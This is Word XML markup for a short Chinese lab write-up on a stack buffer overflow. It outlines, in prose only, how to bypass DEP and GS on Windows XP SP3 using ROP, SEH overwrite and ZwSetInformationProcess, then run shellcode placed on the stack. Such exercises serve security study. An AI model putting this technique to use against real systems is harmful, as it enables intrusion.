    </w:p>
    <w:p w14:paraId="7BEFF01E" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="3EDBAC1B" w14:textId="1376C8A3" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:t>至此我们知道这是一个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>溢出，当</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中的字符串足够长时，会覆盖函数返回地址</w:t>
      </w:r>
      <w:r w:rsidR="00340748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00340748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00340748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的一些重要数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C664F5E" w14:textId="2DC2AE3C" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="4BFF8E88" w14:textId="77777777" w:rsidR="00917C66" w:rsidRPr="000907E8" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2.漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BD8E4" w14:textId="0F4D610F" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>障碍：实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sp3 开启了DEP</w:t>
      </w:r>
      <w:r w:rsidR="002270D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，GS等</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C625E" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思路：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A68B30" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:t>1）通过构造ROP构造出可以执行的内存块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B367E84" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:t>2）利用SEH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A04BC5" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"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中布置</w:t>
      </w:r>
      <w:r>
        <w:t>shellcode同时覆盖SEH，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548798C9" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>结合</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ZwSetInformationProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>关掉DEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD3726" w14:textId="58F32049" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后跳转到栈中执行</w:t>
      </w:r>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A892B12" w14:textId="77777777" w:rsidR="00044AAC" w:rsidRPr="00917C66" w:rsidRDefault="00044AAC"/>
    <w:sectPr w:rsidR="00044AAC" w:rsidRPr="00917C66" w:rsidSect="0029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E"/>
    <w:rsid w:val="00044AAC"/>
    <w:rsid w:val="000907E8"/>
    <w:rsid w:val="002270D7"/>
    <w:rsid w:val="002973C6"/>
    <w:rsid w:val="00340748"/>
    <w:rsid w:val="00450DDE"/>
    <w:rsid w:val="00450FF8"/>
    <w:rsid w:val="00457046"/>
    <w:rsid w:val="00525B74"/>
    <w:rsid w:val="00917C66"/>
    <w:rsid w:val="00DD3B1F"/>
    <w:rsid w:val="00E8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F2C2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{033D4FC1-470B-44B2-80FB-526D74DC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820</Words>
  <Characters>4677</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>38</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-04-05T12:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-05T12:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>